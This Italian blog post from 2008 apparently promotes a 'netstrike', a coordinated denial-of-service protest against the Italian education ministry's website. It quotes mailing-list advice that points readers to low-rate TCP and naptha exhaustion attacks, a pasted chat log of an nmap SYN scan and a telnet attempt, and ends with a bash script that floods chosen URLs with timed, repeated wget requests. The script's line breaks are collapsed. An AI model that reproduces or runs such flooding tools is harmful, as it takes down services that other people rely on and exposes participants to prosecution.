nestrike 2 (vedi post precedente per ora attacco)

http://www.youtube.com/watch?v=YAd0t67vBQI

http://luigipuca.wordpress.com/2008/11/11/sabotiamo-la-gelimini-on-line-il-13-novembre-alle-1400/

 

http://it.wordpress.com/tag/informatica-in-movimento/

 

http://panegiricomoderno.wordpress.com/2008/11/12/scaricare-i-video-da-youtube-direttamente-dal-terminale/

 

 

 

vecna s0ftpj.org

>

avellino autistici.org wrote:

>> riporto dalla lista aha:

>> http://www.autistici.org/133strike/index2.html

insomma ci lamentavamo che hackmeeting non seguisse le linee iniziali,

ma dopo la risposta di a. devo dire che si va a gonfie vele: insomma

certi fumetti sono un pericolo mi diceva una mia amica elena attrice …

grazie a domani lele

> oh, novita’, esiste una medium ed un high.

>

>>

> http://infofreeflow.noblogs.org/post/2008/11/11/netstrike-nogelmini-istruzioni-per-la-modalit-hard-high

>

> HARD HIGH, WGET -O NEL 2008 !?

> HARD HIGH !? !?

>

> Installazione di linux/macosx per usare wget ? OMFG! se si vuole aiutare

> l’utente a usare wget, il promotore dell’iniziativa si scarica cygwin,

> si compila wget.exe e lo distribuisce insieme alla cygwin1.ddl dal sito.

>

> google, ricerca con: low rate tcp attack.

> se vuoi "sacrificar la banda" e’ sufficente che con ifconfig imposti

> l’MTU dell’interfaccia di uscita ad un valore irrisorio (ma >= di 128)

>

> e poi,

> google, ricerca con: naptha exhaustion attack

>

> in entrambe le ricerche non bisogna fermarsi alla prima pagina.

>

> (sono arrivati a parlarne su PUNTO INFORMATICO!!)

> http://punto-informatico.it/2427930/PI/Commenti/sockstress-buco-che-minaccia-internet.aspx

>

> e non ditemi che il kiddame non deve usare gli attacchi perche’ poi si

> fa male, o si dice information want to be free o si dice information

> want to be lobby.

>

> qui c’e’ un elenco storico:

> http://www.isi.edu/~mirkovic/bench/attacks.html

>

>> chi mi spiega meglio quando è stato fatto il primo nestrike

>> e i pericoli legali legati al partecipare col proprio pc a un nestrike?

>

> alcuni sono "attacchi informatici" e per questo perseguibili dalla

> legge, altri sono legittimi usi della rete, che per quanto legittimi, se

> fatti da tante persone, bloccano il servizio perche’ il servizio non e’

> adeguato ad un tale carico.

>

> il denial of service in se e’ un reato in quanto impedisce l’erogazione

> di un servizio, e’ anche vero che per la legge non conta che da un IP

> sono usciti 15k pacchetti e da un altro solo 300, conta che una persona

> vuole commettere l’illecito e per questo viene perseguita.

>

> la forza di un netstrike sta nella distribuzione: tutti fanno operazioni

> legittime di accesso ad un sito, quello che sarebbe piu’ importante e’

> uniformare il tipo di comportamento, anziche’ fare LOW per tanti e VERY

> HOT HARD per pochi.

>

> quello che conta per la legge e’ la volonta’ di far disservizio (e il

> danno che deriva dal disservizio): se tutti fanno la stessa cosa e’

> comprensibile che nessuno potra’ essere perseguito, se uno fa un ping

> flood da 10 megabit dal suo ufficio, causa un’anomalia ben discriminata.

> il disservizio viene causato da tutti, ma lui viene perseguito.

>

>

>> merdusconi come potrebbe vendicarsi?

>

> cercando il tuo numero di telefono ?

>

> http://www.youtube.com/watch?v=YAd0t67vBQI

>

> siamo troppe generazioni avanti, nella mente di chi e’ "vecchio" (non

> nel senso di anziano d’eta’, nel senso di stantio in quanto certezze e

> impossibilità di cambiamento) internet non e’ quello che vedono gli

> utenti, ma una distorsione della realta’ incastonata in una cornice che

> gia’ conoscono.

>

> e ti assicuro che, come gli utenti lo vedono ora, e’ solo una

> distorsione della realta’ in una cornice di poco piu’ grande.

>

> ciao ciao

 

guilt spugna.org wrote:

>

> vecna:

>

>> e non ditemi che il kiddame non deve usare gli attacchi perche’ poi si

>> fa male, o si dice information want to be free o si dice information

>> want to be lobby.

>

> o btw "information wants to be cool", con gente come te o me che di

> fatto non fa una minchia se non spaccare i coglioni.

>

> Intanto quella pagina e’ li’, la tua dov’e’ ? Ah no tu sei vecna quindi

> basta dire agli altri che sono dei pirla il resto vien da se’… ROTFL

>

On Wed, 12 Nov 2008

>

> allora è un giochino che facevo al mare con freeshell da piccolo :)))

> http://web.tiscali.it/dskull/

>

> mo rifarei:

> 1)prima mi iscrivo a www.dnsstuff.com

> dopo l iscrizione mi arriva un e mail accedo con la password e entro qui

> http://private.dnsstuff.com/tools/whois.ch?ip=www.pubblicaistruzione.com

> mi

> esce:

> Registrant: Linkz Internet Services 30369 Seven Mile Beach Grand Cayman,

> Cayman Islands B.W.I. KY Domain name: PUBBLICAISTRUZIONE.COM

> Administrative

> Contact: Domain, Administrator **********@linkz.com 30369 Seven Mile Beach

> Grand Cayman, Cayman Islands B.W.I. KY +1.345.946.6879 Technical Contact:

> Domain, Administrator **********@linkz.com 30369 Seven Mile Beach Grand

> Cayman, Cayman Islands B.W.I. KY +1.345.946.6879 Registrar of Record:

> DomainNameSales Record last updated on 21-Oct-2008. Record expires on

> 26-Dec-2011. Record created on 25-Dec-2005. Domain servers in listed

> order:

> NS1.LINKZ.COM 66.199.187.176 NS2.LINKZ.COM 216.187.103.166 Domain status:

> clientDeleteProhibited clientTransferProhibited clientUpdateProhibited

>

> root@localhost:~# nmap -v -sS -O

> QUITTING! root@localhost:~# nmap -v -sS -O ++.++.++.+++ (indirizzo ip)

>

> (03:24:17) : ok adesso tu hai visto che porte ho aperte, se provi

> telnet prova, ti chiede user e pass

>

> (03:24:24) : telnet

> (03:25:12) : scrivo telnet ok

> (03:25:31) : telnet ip

> (03:26:27) : ma vedi che sistema ho??? nello scan????

> (03:27:33) : telnet ++.++.++.+++ scrivi questo

> (03:28:04) : ok

> (03:29:16) : vedi che ti chiede user e login ???

> (03:29:17) : root@localhost:~# telnet ++.++.++.+++

> (03:33:20) : questo vuol dire che io ho la porta ftp aperta e le

> altre blokkate dal firewall

> (03:40:07) : prima fai lsmod e vedi che moduli hai x la scheda

> comunque alsaconf li trova

> domandina: son stato un hacker etico?

> ciao

>

>

>

> marco@bertorello.ns0.it wrote:

>> Il 12 novembre ha scritto:

>>> non proseguo la lettura perche’ al solito sei pure lungo e noioso

>>

>> Peccato per te… è interessante

>>

>>

>>

>

root@localhost:~# nmap -v -sS -O


Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-07-25 03:11
CEST
No target machines/networks specified!


QUITTING! root@localhost:~# nmap -v -sS -O ++.++.++.+++


Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-07-25 03:14
CEST
Initiating SYN Stealth Scan against host+++-++.poo+++++.interbusiness.it
(++.++.++.+++) [++++ ports] at 03:14
Discovered open port 80/tcp on ++.++.++.+++
Discovered open port 23/tcp on ++.++.++.+++
Discovered open port 21/tcp on ++.++.++.+++
The SYN Stealth Scan took 15.69s to scan 1663 total ports.
For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled
Host host+++-++.poo++++.interbusiness.it (++.++.++.+++) appears to be up
… good.
Interesting ports on host+++-++.poo++++.interbusiness.it (++.++.++.+++):
(The 1656 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
23/tcp open telnet
80/tcp open http
136/tcp filtered profile
137/tcp filtered netbios-ns
500/tcp filtered isakmp
Device type: remote management|general purpose|media device|broadband router
Running: Compaq embedded, FreeBSD 4.X, IBM AIX 3.X|4.X, Linux 1.X, Phillips
embedded, Zyxel ZyNOS
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SInfo(V=3.75%P=i486-slackware-linux-gnu%D=7/25%Tm=42E43CF7%O=21%C=1)
TSeq(Class=64K%IPID=I%TS=2HZ)
T1(Resp=N)
T2(Resp=N)
T3(Resp=N)
T4(Resp=N)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Uptime 0.579 days (since Sun Jul 24 13:20:41 2005)
TCP Sequence Prediction: Class=64K rule
Difficulty=1 (Trivial joke)
IPID Sequence Generation: Incremental
Nmap run completed — 1 IP address (1 host up) scanned in 19.288 seconds


root@localhost:~#
e doveva uscire telnet

(03:24:17) : ok adesso tu hai visto che porte ho aperte, se provi
telnet prova, ti chiede user e pass
(03:24:24) : telnet
(03:25:12) : scrivo telnet ok
(03:25:31) : telnet ip
(03:26:27) : ma vedi che sistema ho??? nello scan????
(03:27:33) : telnet ++.++.++.+++ scrivi questo
(03:28:04) : ok
(03:29:16) : vedi che ti chiede user e login ???
(03:29:17) : root@localhost:~# telnet ++.++.++.+++
Trying ++.++.++.+++…
Connected to ++.++.++.+++.
Escape character is ‘^]’.
Sorry, trouble to establish connection.
Connection closed by foreign host.
root@localhost:~#

http://web.archive.org/web/20060530021050/http://www.stelladelsudteam.com/modules.php?name=Telnet
(03:32:06) : io dicevo così xchè nn ti connetti
(03:32:17) : il mio fw forse fdunziona ::))
(03:32:48) : For OSScan assuming port 21 is open, 1 is closed, and
neither are fir
alled
(03:32:52) : vedi
(03:33:20) : questo vuol dire che io ho la porta ftp aperta e le
altre blokkate dal firewall
(03:40:07) : prima fai lsmod e vedi che moduli hai x la scheda
comunque alsaconf li trova
(03:41:20) : lp 6404 0 (autoclean)
parport 22824 0 (autoclean) [lp]
uhci 24284 0 (unused)
ehci-hcd 17516 0 (unused)
usbcore 58860 1 [uhci ehci-hcd]
hw_random 2712 0 (unused)
i810_rng 2528 0 (unused)
snd-intel8x0m 8708 1
snd-ac97-codec 52472 0 [snd-intel8x0m]
snd-pcm 54504 1 [snd-pcm-oss snd-intel8x0m snd-ac97-codec]
snd-timer 13412 0 [snd-pcm]
snd 31268 0 [snd-pcm-oss snd-mixer-oss snd-intel8x0m
snd-ac97-codecsnd-pcm snd-timer]
snd-page-alloc 4712 0 [snd-mixer-oss snd-intel8x0m snd-pcm
snd-timer snd]
soundcore 3396 3 [snd]
8139too 13928 1
mii 2272 0 [8139too]
crc32 2880 0 [8139too]
ohci1394 23888 0 (unused)
ieee1394 41636 0 [ohci1394]
ds 6548 2
yenta_socket 10436 1
pcmcia_core 39172 0 [ds yenta_socket]
ide-scsi 9392 0
agpgart 45092 0 (unused)
http://www.youtube.com/watch?v=YAd0t67vBQI

su piazzanavona

http://www.archive.org/details/Burattini2008

bellissimo il finale:

> http://it.wikipedia.org/wiki/Netstrike

>

> i rischi..?..

>

> tor e privoxy dovrebbero bastare….

>

> per favore non diciamo cagate madornali!

>

> un netstrike attraverso TOR e’ un colpo durissimo all’infrastruttura di

> TOR stessa.

>

> evitare, evitare, evitare

>

>

> sgs pooed:

>

>> intanto, (parlo da niubbo quale sono) quando scrive vecna c’e’ (quasi)

>> sempre qualcosa da imparare..

>

> qualcosa da farsi dire, forse … in ogni caso se sei poco curioso mica

> e’ un problema di questa comunità.

>

>

>> uno si iscrive ad una lista che si chiama hackmeeting e si ritrova a

>> leggere di tutto tranne che di hacking (pur intendendolo nella sua

>> accezione piu’ ampia) ..

>

> pensavi fosse il circolo dei fighi al quale avere accesso a gratis e per

> questo diventare un figo a tua volta ?

> Mi sa che resti la solita macchietta del "wannabe per caso", come in

> tante ne passano qua dentro …

>

>

>> parliamo un po’ di sicurezza, bugs, *spippolamenti* vari?!

>

> ti piacerebbe, eh …

>

> in realta’ ne parliamo tutti sempre ma tu non sai leggere perche’ sei

> solo

>

>

> UAAAAAAAAAAAAAAAAAAAAAAAAAAAA

>

> UN KID DI MERDAAAAAAAAAAAAAAAAAAAAAAAAA

>

>

> SUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUX

>

>

> ciao confindustria

mia nota

http://www.ubcfumetti.com/enciclopedia/superman/

 

script con comando wget

#!/bin/bashfunction help() {echo -ne "n$(basename $0) [ -r RATE[k|m]] [ -d SLEEP ] [ -s START ] [ -k STOP ] URL [URL ...]"echo -ne "n- RATE, banda in bytes, kbytes o megabytes (def. 3k)."echo -ne "n- SLEEP, time di refresh (def. 1 sec)."echo -ne "n- START, data inizio netstrike (def. now)."echo -ne "n- STOP, data di fine netstrike (def. now + 5 min)."echo -ne "n- URL elenco delle pagine da aprire =] nn"exit $2}#def valueRATE="--limit-rate=3k"DELAY=1NOW=$(date '+%s')START=$NOWSTOP=$(($NOW + 300))ARG=OK[ -z "$1" ] && help 1while [ ! -z "$ARG" ]doARG="$1";VALUE="$2";case "$ARG" in-h|--help)help 1;;-r|--rate) RATE="--limit-rate=$VALUE"shift;;-d|--delay)DELAY="$VALUE"shift;;-s|--start)START=$(date -d "$VALUE" '+%s')shift;;-k|--stop)STOP=$(date -d "$VALUE" '+%s')shift;;*)URLS="$URLS $ARG";;esacshiftdoneecho "netstrike:"echo $URLS | tr " " "n"echo "From " $(date -d "01/01/1970 +1 hours $START sec" '+%d/%m/%Y %H:%M:%S')echo "To   " $(date -d "01/01/1970 +1 hours $STOP sec" '+%d/%m/%Y %H:%M:%S')echo "limite di banda ${RATE##--limit-rate=}bit/sec"echo "aspetto $DELAY seconds al prox refresh"echo ""if [ $START -gt $NOW ]thenecho "attendo..."sleep $(($START - $NOW))fiecho "Netstrike avviato."while [ $NOW -lt $STOP ]dofor URL in $URLSdowget $RATE --no-http-keep-alive --cache=off --output-document=- --quiet $URL > /dev/nulldoneecho -ne "."sleep $DELAYNOW=$(date '+%s')doneecho "."
preso dall attacco high qui trovate un link che ne spiega l uso
http://bongolinux.com/wget%E2%80%A6questo-sconosciuto/06/
 

 

This entry was posted in Generale. Bookmark the permalink.